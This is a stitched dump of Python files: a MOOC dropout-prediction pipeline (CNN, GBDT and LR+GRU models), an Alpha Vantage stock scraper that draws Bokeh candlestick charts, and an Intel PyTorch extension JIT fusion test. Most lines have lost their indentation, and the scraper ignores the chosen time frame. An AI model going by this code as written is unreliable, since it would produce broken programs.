emb2 = self.video_embedding(video_id)
x = torch.cat([emb1,emb2,continues], 2)
x = x.permute(0, 2, 1) # Batch_size * (feature_dim) * max_sen_len
x1 = self.conv1(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x1 = self.ReLU_activation(x1)
x1 = self.maxpool1(x1)
x1 = x1.squeeze(2)
x2 = self.conv2(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x2 = self.ReLU_activation(x2)
x2 = self.maxpool2(x2)
x2 = x2.squeeze(2)
x3 = self.conv3(x)#.squeeze(2) # shape = (64, num_channels, 1)(squeeze 2)
x3 = self.ReLU_activation(x3)
x3 = self.maxpool3(x3)
x3 = x3.squeeze(2)
all_out = torch.cat((x1, x2, x3), dim=1)
# print(all_out.shape)
info_fusion = self.tanh_activation(self.fc1(all_out))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
# result = self.softmax(final_out)
result = self.sigmoid(final_out)
        return result  # return the sigmoid probability
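# Shape walk-through for the CNN above (batch size B is illustrative):
#   course_id:  (B, 70)  -> course embedding (B, 70, 5)
#   video_id:   (B, 70)  -> video embedding  (B, 70, 15)
#   continues:  (B, 70, 13)
#   concatenated: (B, 70, 33), permuted to (B, 33, 70) for Conv1d
#   each conv/ReLU/max-pool branch yields (B, 32); concatenated: (B, 96)
#   fully connected head: 96 -> 64 -> 16 -> 1, followed by a sigmoid.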
model_CNN = CNN()
model_CNN.load_state_dict(torch.load('textcnn_25epoch.model'))
model_CNN.eval()
def prediction_train_seperately(course_vecs_CNN):
course_id = []
video_id = []
continues_feature = []
#get x for CNN
course_list = course_vecs_CNN
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN).clone().long()
video_id = torch.tensor(video_id).clone().long()
    predictions_cnn = model_CNN(course_id_CNN, video_id, continues_feature2)
    predictions = torch.flatten(predictions_cnn)
results_prob = predictions.detach().numpy().tolist()
return results_prob
def merge_results(result1,result2):
result = []
for i in range(len(result1)):
result.append( int(np.round((result1[i]+result2[i])/2)) )
return result
def merge_results_prob(result1,result2):
result = []
for i in range(len(result1)):
result.append( (result1[i]+result2[i])/2 )
return result
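# Inference pipeline: the GBDT branch and the CNN branch each produce one
# probability per (user, course) pair; merge_results() averages and rounds them
# into hard labels, while merge_results_prob() keeps the averaged probabilities
# for the AUC computation.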
test_set['gbdt_result'] = test_set.progress_apply(lambda row: gbdt_prediction(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
test_set['textcnn_result'] = test_set['course_vecs_CNN'].progress_apply(lambda x : prediction_train_seperately(x))
test_set['predictions'] = test_set.progress_apply(lambda row: merge_results(row['textcnn_result'],row['gbdt_result']), axis=1)
test_set['predictions_prob'] = test_set.progress_apply(lambda row: merge_results_prob(row['textcnn_result'],row['gbdt_result']), axis=1)
final_result = test_set[['predictions']].values.tolist()
final_result_prob = test_set[['predictions_prob']].values.tolist()
ground_truth = test_set[['label_list']].values.tolist()
# test = final_result.values.tolist()
final_result = [ item for elem in final_result for item in elem]
final_result = [ item for elem in final_result for item in elem]
final_result_prob = [ item for elem in final_result_prob for item in elem]
final_result_prob = [ item for elem in final_result_prob for item in elem]
ground_truth = [ item for elem in ground_truth for item in elem]
ground_truth = [ item for elem in ground_truth for item in elem]
acc = calculate_acc(final_result,ground_truth)
auc = roc_auc_score(ground_truth, final_result_prob)
f1=f1_score(ground_truth, final_result, average='macro')
```
#### File: JiayinL/Dropout-Prediction/LR_GRU.py
```python
import pandas as pd
import pandas_profiling
from sklearn.preprocessing import LabelEncoder
from tqdm import tqdm
from joblib import Parallel,delayed
import numpy as np
import json
import re
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.utils.rnn as rnn_utils
from sklearn.utils import shuffle
def time_transform(t):
    # parse the timestamp string into a time struct
    timeArray = time.strptime(t, "%Y-%m-%d %H:%M:%S")
    # convert the time struct into a unix timestamp (seconds)
    timeStamp = int(time.mktime(timeArray))
    return timeStamp
def Z_score(mean_, std_,x):
return (x-mean_)/std_
def max_mean_std(data):
return np.max(data), np.mean(data), np.std(data)
def calculate_acc(predictions, truth):
hit = 0
for i in range(len(predictions)):
if predictions[i] == truth[i]:
hit = hit +1
return hit/len(predictions)
train_set_course_vec = pd.read_csv('train_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
test_set_course_vec = pd.read_csv('test_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
def training_data_prep():
course_id = []
video_id = []
continues_feature1 = []
data = train_set_course_vec[['label_list','course_vecs_LR','course_vecs_CNN']]
data = shuffle(data) #Shuffle data
#get y
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
#get x for LR
course_info_LR = data['course_vecs_LR'].values.tolist()
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
course_cat1 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
course_cat1.append(cat_feture1)
con_feture = s[1:] #get continues features
course_con.append(con_feture)
course_id_LR.append(course_cat1)
continues_feature1.append(course_con)
#get x for CNN
course_info_CNN = data['course_vecs_CNN'].values.tolist()
course_list = [ item for elem in course_info_CNN for item in elem]
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
y = torch.tensor(y)
return continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y
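# Each training example is one (user, course) pair: the LR branch gets the
# course id plus a flat 42-dim feature vector, while the GRU branch gets a
# sequence of up to sequence_len per-video records (course id, video id and 13
# continuous features), padded with the dummy ids 706/38180 and zero vectors.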
def test_data_prep():
course_id = []
video_id = []
continues_feature = []
data = test_set_course_vec[['label_list','course_vecs_LR','course_vecs_CNN']]
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
#get x for LR
course_info_LR = data['course_vecs_LR'].values.tolist()
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
course_cat1 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
course_cat1.append(cat_feture1)
con_feture = s[1:] #get continues features
course_con.append(con_feture)
course_id_LR.append(course_cat1)
continues_feature1.append(course_con)
#get x for CNN
course_info_CNN = data['course_vecs_CNN'].values.tolist()
course_list = [ item for elem in course_info_CNN for item in elem]
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
y = torch.tensor(y)
return continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y
def prediction(course_vecs_LR,course_vecs_CNN):
course_id = []
video_id = []
continues_feature = []
#get x for LR
course_info_LR = course_vecs_LR
course_id_LR = []
continues_feature1 = []
for i in range(len(course_info_LR)): #get a course
c = course_info_LR[i]
cat_feture1 = c[0] #get course_id and video_id
con_feture = c[1:] #get continues features
course_id_LR.append(cat_feture1)
continues_feature1.append(con_feture)
#get x for CNN
# course_info_CNN = course_vecs_CNN
course_list = course_vecs_CNN
# print(course_list[0][0])
course_id_CNN = []
video_id = []
continues_feature2 = []
for i in range(len(course_list)): #get a course
c = course_list[i]
course_cat1 = []
course_cat2 = []
course_con = []
for j in range(len(c)): #get a subject
s = c[j]
cat_feture1 = s[0] #get course_id and video_id
cat_feture2 = s[1]
course_cat1.append(cat_feture1)
course_cat2.append(cat_feture2)
con_feture = s[2:] #get continues features
course_con.append(con_feture)
if len(course_cat1)<sequence_len:
length = sequence_len - len(course_cat1)
temp_course_id = [706] * length
temp_video_id = [38180] * length
temp2 = [[0,0,0,0,0,0,0,0,0,0,0,0,0]] * length
course_cat1 = course_cat1 + temp_course_id
course_cat2 = course_cat2 + temp_video_id
course_con = course_con + temp2
course_id_CNN.append(course_cat1)
video_id.append(course_cat2)
continues_feature2.append(course_con)
# to tensor
continues_feature1 = [ item for elem in continues_feature1 for item in elem]
course_id_LR = [ item for elem in course_id_LR for item in elem]
continues_feature1 = torch.tensor(continues_feature1)
course_id_LR = torch.tensor(course_id_LR)
continues_feature2 = torch.tensor(continues_feature2)
course_id_CNN = torch.tensor(course_id_CNN)
video_id = torch.tensor(video_id)
    # no labels are available at prediction time, so only the feature tensors are returned
    return continues_feature1, continues_feature2, course_id_LR, course_id_CNN, video_id
nb_courses = 706+1
course_emb_size = 5
nb_videos = 38181+1
video_emb_size = 15
sequence_len = 70
# in_channel =
feature_size2 = course_emb_size + video_emb_size + 13
feature_size1 = course_emb_size + 42
hidden_dim = 64
num_of_lstm_layer = 1
class LR_GRU(nn.Module):
def __init__(self):
super(LR_GRU, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.bi_gru = nn.GRU(input_size = feature_size2, hidden_size = hidden_dim // 2, num_layers=num_of_lstm_layer, bidirectional=True)
self.lr_fc = nn.Linear(feature_size1, 1)
self.fc1 = nn.Linear(hidden_dim, 32)
self.fc2 = nn.Linear(32, 16)
self.fc3 = nn.Linear(16, 1)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.sigmoid_activation = nn.Sigmoid()
self.final_fc = nn.Linear(2, 1)
def forward(self, courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1_LR = self.course_embedding(courseid_LR)
emb1_CNN = self.course_embedding(courseid_CNN)# (batch_size,max_sen_len, embed_size)
emb2 = self.video_embedding(videoid)
# LR part
LR_x = torch.cat([emb1_LR,continuesfeature1], 1)
LR_result = self.sigmoid_activation(self.lr_fc(LR_x))
#GRU part
GRU_x = torch.cat([emb1_CNN,emb2,continuesfeature2], 2)
        GRU_x = GRU_x.permute(1, 0, 2)  # (max_sen_len, batch_size, feature_dim) for the GRU
bigru_out, _ = self.bi_gru(GRU_x)
output = bigru_out[-1]
info_fusion = self.tanh_activation(self.fc1(output))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
GRU_result = self.sigmoid_activation(final_out)
#combine two result
final_input = torch.cat((LR_result, GRU_result), dim=1)
result = self.sigmoid_activation(self.final_fc(final_input))
return result,LR_result,GRU_result
class LR_single_direc_GRU(nn.Module):
def __init__(self):
super(LR_single_direc_GRU, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.bi_gru = nn.GRU(input_size = feature_size2, hidden_size = hidden_dim , num_layers=num_of_lstm_layer, bidirectional=False)
self.lr_fc = nn.Linear(feature_size1, 1)
self.fc1 = nn.Linear(hidden_dim, 16)
self.fc2 = nn.Linear(16, 8)
self.fc3 = nn.Linear(8, 1)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.sigmoid_activation = nn.Sigmoid()
self.final_fc = nn.Linear(2, 1)
def forward(self, courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1_LR = self.course_embedding(courseid_LR)
emb1_CNN = self.course_embedding(courseid_CNN)# (batch_size,max_sen_len, embed_size)
emb2 = self.video_embedding(videoid)
# LR part
LR_x = torch.cat([emb1_LR,continuesfeature1], 1)
LR_result = self.sigmoid_activation(self.lr_fc(LR_x))
#GRU part
GRU_x = torch.cat([emb1_CNN,emb2,continuesfeature2], 2)
        GRU_x = GRU_x.permute(1, 0, 2)  # (max_sen_len, batch_size, feature_dim) for the GRU
bigru_out, _ = self.bi_gru(GRU_x)
output = bigru_out[-1]
info_fusion = self.tanh_activation(self.fc1(output))
info_fusion = self.tanh_activation(self.fc2(info_fusion))
final_out = self.fc3(info_fusion)
GRU_result = self.sigmoid_activation(final_out)
#combine two result
final_input = torch.cat((LR_result, GRU_result), dim=1)
result = self.sigmoid_activation(self.final_fc(final_input))
return result,LR_result,GRU_result
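# Both models above combine a per-course logistic-regression branch with a
# sequence branch: the LR branch maps [course embedding (5) + 42 features] = 47
# dims to one logit, the GRU branch encodes the padded (70, 33)-dim video
# sequence into a 64-dim state and maps it to one logit, and final_fc learns a
# weighted blend of the two sigmoid outputs.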
model = LR_single_direc_GRU()
optimizer = optim.Adam(model.parameters(), lr=0.001)
criterion = nn.BCELoss()  # binary cross-entropy on the sigmoid outputs
epoach_count = 15 #40
batchSize = 512
loss_value = []
acc_value = []
times = []
for m in model.modules():
if isinstance(m, (nn.Conv1d, nn.Linear)):
nn.init.xavier_uniform_(m.weight)
test_continues_feature1,test_continues_feature2,test_course_id_LR,test_course_id_CNN,test_video_id,ground_truth = test_data_prep()
ground_truth = ground_truth.detach().numpy().tolist()
for epoach in range(epoach_count):
start = time.time()
continues_feature1,continues_feature2,course_id_LR,course_id_CNN,video_id,y = training_data_prep()
numOfMinibatches = int(len(course_id_CNN) / batchSize) + 1
numOfLastMinibatch = len(course_id_CNN) % batchSize
# loss_value = []
for batchID in range(numOfMinibatches):
if batchID == numOfMinibatches-1:
numbOfBatches = numOfLastMinibatch
else:
numbOfBatches = batchSize
leftIndex = batchID * batchSize
rightIndex = leftIndex + numbOfBatches
courseid_LR = course_id_LR[leftIndex: rightIndex].clone().long()
videoid = video_id[leftIndex: rightIndex].clone().long()
continuesfeature1 = continues_feature1[leftIndex: rightIndex].clone()
courseid_CNN = course_id_CNN[leftIndex: rightIndex].clone().long()
continuesfeature2 = continues_feature2[leftIndex: rightIndex].clone()
predictions,LR_result,GRU_result = model(courseid_LR,courseid_CNN,continuesfeature1,continuesfeature2,videoid)
predictions = torch.flatten(predictions)
LR_result = torch.flatten(LR_result)
GRU_result = torch.flatten(GRU_result)
        loss_final = criterion(predictions, y[leftIndex: rightIndex].float())
        loss_lr = criterion(LR_result, y[leftIndex: rightIndex].float())
        loss_gru = criterion(GRU_result, y[leftIndex: rightIndex].float())
# print('loss: ',loss)
loss = loss_final + loss_lr +loss_gru
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_value.append(loss.item())
#testing
if(batchID%100==0):
test_numOfMinibatches = int(len(test_course_id_LR) / batchSize) + 1
test_numOfLastMinibatch = len(test_course_id_LR) % batchSize
results = []
for test_batchID in range(test_numOfMinibatches):
if test_batchID == test_numOfMinibatches-1:
test_numbOfBatches = test_numOfLastMinibatch
else:
test_numbOfBatches = batchSize
test_leftIndex = test_batchID * batchSize
test_rightIndex = test_leftIndex + test_numbOfBatches
test_courseid_LR = test_course_id_LR[test_leftIndex: test_rightIndex].clone().long()
test_videoid = test_video_id[test_leftIndex: test_rightIndex].clone().long()
test_continuesfeature1 = test_continues_feature1[test_leftIndex: test_rightIndex].clone()
test_courseid_CNN = test_course_id_CNN[test_leftIndex: test_rightIndex].clone().long()
test_continuesfeature2 = test_continues_feature2[test_leftIndex: test_rightIndex].clone()
test_predictions,_,_ = model(test_courseid_LR,test_courseid_CNN,test_continuesfeature1,test_continuesfeature2,test_videoid)
test_predictions = torch.round(torch.flatten(test_predictions))
results.append(test_predictions.detach().numpy().tolist())
result = [ item for elem in results for item in elem]
# ground_truth = ground_truth.detach().numpy().tolist()
acc = calculate_acc(result,ground_truth)
acc_value.append(acc)
print('Epoch[{}/{}],loss:{:.4f},loss_final:{:.4f},loss_LR:{:.4f},loss_GRU:{:.4f},acc:{:.4f}'.format(epoach, epoach_count,loss.item(),loss_final.item(),loss_lr.item(),loss_gru.item(),acc))
# batchIndex = batchList[leftIndex: rightIndex]
end = time.time()
interval = end-start
times.append(interval)
print('time:{:.4f}'.format(interval))
torch.save(model.state_dict(), 'lr_gru.model')
```
{
"source": "jiayi-ren/stock-scraper",
"score": 3
}
#### File: jiayi-ren/stock-scraper/scraper.py
```python
import alpha_vantage
from alpha_vantage.timeseries import TimeSeries
import datetime,os,sys,pandas
import bokeh
from bokeh.plotting import figure,show,save,output_file
# read the API key from a local text file (expects the key on the first line)
with open("Alpha Vantage API key.txt") as key_file:
    API_Key = key_file.read().strip()
ts = TimeSeries(key=API_Key, output_format='pandas')
################### Stock data scraper ############
def intraday(stock, interval, size):
    data, meta_data = ts.get_intraday(symbol=stock, interval=interval, outputsize=size)
    return data
def daily(stock, size):
    data, meta_data = ts.get_daily(symbol=stock, outputsize=size)
    return data
def weekly(stock, size):
    # the weekly endpoint always returns the full history, so size is unused
    data, meta_data = ts.get_weekly(symbol=stock)
    return data
def monthly(stock, size):
    # the monthly endpoint always returns the full history, so size is unused
    data, meta_data = ts.get_monthly(symbol=stock)
    return data
################### User Input ####################
try:
stock = input("Enter Stock Symbol: ") #stock symbol e.g. SPY
duration = input("Choose Time Frame (intraday/daily/weekly/monthly): ")
if duration == "intraday" :
interval = input("Choose interval (1min, 5min, 15min, 30min) :") #1min,5min, 15min, 30min, 60min
size = input("Choose data size (compact, full)\n" +
"##compact:latest 100 data points##\n##full:all available datapoints##\ncompact or full? ") #compact:latest 100 data points, full:all available datapoints
    if size not in ("compact", "full"):
size = input("Re-choose compact or full: ")
    df = daily(stock, size)  # note: only daily data is fetched, regardless of the chosen time frame
####### Invalid stock symbol check ###############
except ValueError:
print("\nInvalid stock symbol")
sys.exit()
df.columns=['open','high','low','close','volume']
df.index =pandas.to_datetime(df.index, format='%Y-%m-%d')
########### stock data output file ###################
datafile = input("Enter a output data file name: ")
df.to_csv(datafile +".csv")
################## Bokeh Graph saved to HTML file ##############
htmlfilename=input("Enter graph file name otherwise N/A: ")
def inc_dec(c, o):
if c > o:
value="Up"
elif c < o:
value="Down"
else:
value="Equal"
return value
def bokeh_graph(htmlfile= "N/A"):
df["Status"]=[inc_dec(c, o) for c, o in zip(df.close,df.open)]
df["Middle"]=(df.open+df.close)/2
df["Height"]=abs(df.open-df.close)
p=figure(x_axis_type='datetime',plot_width=500,plot_height=300, sizing_mode="scale_width")
p.title.text="Candlestick chart"
p.grid.grid_line_alpha=0
p.segment(df.index,df.high,df.index,df.low,color="Black")
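    # Bokeh datetime axes are measured in milliseconds, so 12 hours is used below as the candlestick width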
hours_12=12*60*60*1000
p.rect(df.index[df.Status=='Up'],df.Middle[df.Status=="Up"], hours_12,
df.Height[df.Status=='Up'],fill_color="green",line_color="black")
p.rect(df.index[df.Status=='Down'],df.Middle[df.Status=="Down"], hours_12,
df.Height[df.Status=='Down'],fill_color="red",line_color="black")
if "N/A" in htmlfile.upper():
pass
else:
output_file(htmlfile+".html")
save(p)
bokeh_graph(htmlfilename)
```
{
"source": "jiayisunx/intel-extension-for-pytorch",
"score": 2
}
#### File: tests/cpu/test_jit.py
```python
from __future__ import division
from __future__ import print_function
'''
From PyTorch:
Copyright (c) 2016- Facebook, Inc (<NAME>)
Copyright (c) 2014- Facebook, Inc (<NAME>)
Copyright (c) 2011-2014 Idiap Research Institute (<NAME>)
Copyright (c) 2012-2014 Deepmind Technologies (Koray Kavukcuoglu)
Copyright (c) 2011-2012 NEC Laboratories America (Koray Kavukcuoglu)
Copyright (c) 2011-2013 NYU (<NAME>)
Copyright (c) 2006-2010 NEC Laboratories America (<NAME>, <NAME>, <NAME>, <NAME>)
Copyright (c) 2006 Idiap Research Institute (<NAME>)
Copyright (c) 2001-2004 Idiap Research Institute (<NAME>, <NAME>, <NAME>)
From Caffe2:
Copyright (c) 2016-present, Facebook Inc. All rights reserved.
All contributions by Facebook:
Copyright (c) 2016 Facebook Inc.
All contributions by Google:
Copyright (c) 2015 Google Inc.
All rights reserved.
All contributions by Yangqing Jia:
Copyright (c) 2015 Yang<NAME>
All rights reserved.
All contributions from Caffe:
Copyright(c) 2013, 2014, 2015, the respective contributors
All rights reserved.
All other contributions:
Copyright(c) 2015, 2016 the respective contributors
All rights reserved.
Caffe2 uses a copyright model similar to Caffe: each contributor holds
copyright over their contributions to Caffe2. The project versioning records
all such contribution and copyright details. If a contributor wants to further
mark their specific copyright on a particular contribution, they should
indicate their copyright solely in the commit message of the change when it is
committed.
All rights reserved.
'''
"""Tests for rn50."""
import math
import random
import unittest
from functools import reduce
import torch
import torch.nn as nn
from torch.jit._recursive import wrap_cpp_module
import copy
import intel_pytorch_extension as ipex
from intel_pytorch_extension import core
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn import Parameter
import torch.nn.functional as F
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
from torch._six import inf, nan
from common_utils import TestCase, iter_indices, TEST_NUMPY, TEST_SCIPY, TEST_MKL, \
TEST_LIBROSA, run_tests, download_file, skipIfNoLapack, suppress_warnings, \
IS_WINDOWS, PY3, NO_MULTIPROCESSING_SPAWN, do_test_dtypes, do_test_empty_full, \
IS_SANDCASTLE, load_tests, brute_pdist, brute_cdist, slowTest, \
skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf
device = ipex.DEVICE
#device = 'cpu:0'
SIZE = 100
conv_module = {2 : torch.nn.Conv2d, 3 : torch.nn.Conv3d}
bn_module = {2 : torch.nn.BatchNorm2d, 3 : torch.nn.BatchNorm3d}
class ConvBatchNorm_Fixed(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvBatchNorm_Fixed, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.bn = bn_module[dim](out_channels, eps=0.001)
def forward(self, x):
return self.bn(self.conv(x))
class ConvRelu_Fixed(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvRelu_Fixed, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
return F.relu(self.conv(x), inplace=True)
class ConvSum(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvSum, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.conv1 = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
a = self.conv(x)
b = self.conv1(x)
return a+b
class CascadedConvBnSumRelu(nn.Module):
def __init__(self, dim, in_channels, mid_channels, out_channels, **kwargs):
super(CascadedConvBnSumRelu, self).__init__()
torch.manual_seed(2018)
self.conv = conv_module[dim](in_channels, mid_channels, bias=False, **kwargs)
self.conv1 = conv_module[dim](
mid_channels, out_channels, bias=False, padding=1, **kwargs)
self.conv2 = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
self.bn = bn_module[dim](mid_channels, eps=0.001)
self.bn1 = bn_module[dim](out_channels, eps=0.001)
self.bn2 = bn_module[dim](out_channels, eps=0.001)
def forward(self, x):
a = self.conv(x)
a = self.bn(a)
a = F.relu(a, inplace=True)
a = self.conv1(a)
a = self.bn1(a)
b = self.conv2(x)
b = self.bn2(b)
return F.relu(a.add_(b), inplace=True)
class LinearRelu(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(LinearRelu, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.linear = nn.Linear(in_channels, out_channels, **kwargs)
def forward(self, x):
return F.relu(self.linear(x), inplace=True)
class ConvSumInDiffBlock(nn.Module):
def __init__(self, dim, in_channels, out_channels, **kwargs):
super(ConvSumInDiffBlock, self).__init__()
seed = 2018
torch.manual_seed(seed)
self.conv = conv_module[dim](in_channels, out_channels, bias=False, **kwargs)
def forward(self, x):
y = self.conv(x)
if y.size(1) != x.size(1):
y += F.pad(x,
(0, 0, 0, 0, 0, y.size(1) - x.size(1)), 'constant', 0.)
else:
y += x
return y
class Tester(TestCase):
def _test_output(self, model, x, kind_in_graph=None, kind_not_in_graph=None):
modelName = model.__class__.__name__
core.disable_jit_opt()
core.disable_mix_bf16_fp32()
model = model.to(device).eval()
x = x.to(device)
with torch.no_grad():
result = model(x)
script_model = torch.jit.script(model)
script_model.eval()
trace_model = torch.jit.trace(model, x)
trace_model.eval()
with torch.no_grad():
sresult = script_model(x)
tresult = trace_model(x)
self.assertEqual(result, sresult)
self.assertEqual(result, tresult)
core.enable_jit_opt()
script_fused_model = torch.jit.script(model)
trace_fused_model = torch.jit.trace(model, x)
with torch.no_grad():
# conv relu fusion, conv sum fusion or conv sum relu fusion
script_graph = script_fused_model.graph_for(x)
fused_sresult = script_fused_model(x)
trace_graph = trace_fused_model.graph_for(x)
fused_tresult = trace_fused_model(x)
self.assertEqual(result, fused_sresult)
self.assertEqual(result, fused_tresult)
# check if the fused node exists in the graph
if kind_in_graph is not None:
self.assertTrue(any(n.kind() == kind_in_graph for n in script_graph.nodes()))
self.assertTrue(any(n.kind() == kind_in_graph for n in trace_graph.nodes()))
# check if certain node does not exist in the graph
if kind_not_in_graph is not None:
self.assertTrue(all(n.kind() != kind_not_in_graph for n in script_graph.nodes()))
self.assertTrue(all(n.kind() != kind_not_in_graph for n in trace_graph.nodes()))
def _test_output_bf16(self, model, x, kind_in_graph=None, kind_not_in_graph=None, prec=None):
modelName = model.__class__.__name__
core.enable_auto_dnnl()
core.enable_jit_opt()
core.enable_mix_bf16_fp32()
model = model.to(ipex.DEVICE).eval()
x = x.to(ipex.DEVICE)
x2 = x.clone()
x3 = x.clone()
script_fused_model = torch.jit.script(copy.deepcopy(model))
trace_fused_model = torch.jit.trace(copy.deepcopy(model), x3)
with torch.no_grad():
# bf16, native path
result = model(x)
# bf16, jit script path
script_graph = script_fused_model.graph_for(x2)
fused_sresult = script_fused_model(x2)
# bf 16, jit trace path
trace_graph = trace_fused_model.graph_for(x3)
fused_tresult = trace_fused_model(x3)
# disable mix_bf16_fp32 when the calculation is done
# to avoid affecting other scripts
core.disable_mix_bf16_fp32()
self.assertEqual(fused_sresult, result, prec=prec)
self.assertEqual(fused_tresult, result, prec=prec)
# check if the fused node exists in the graph
if kind_in_graph is not None:
self.assertTrue(any(n.kind() == kind_in_graph for n in script_graph.nodes()))
self.assertTrue(any(n.kind() == kind_in_graph for n in trace_graph.nodes()))
# check if certain node does not exist in the graph
if kind_not_in_graph is not None:
self.assertTrue(all(n.kind() != kind_not_in_graph for n in script_graph.nodes()))
self.assertTrue(all(n.kind() != kind_not_in_graph for n in trace_graph.nodes()))
def test_output_conv_bn_2d(self):
self._test_output(
ConvBatchNorm_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="aten::conv2d",
kind_not_in_graph="aten::batch_norm",)
self._test_output_bf16(
ConvBatchNorm_Fixed(2, 3, 32, kernel_size=3, stride=1),
torch.randn(32, 3, 64, 64),
kind_in_graph="aten::conv2d",
kind_not_in_graph="aten::batch_norm",
prec=0.02)
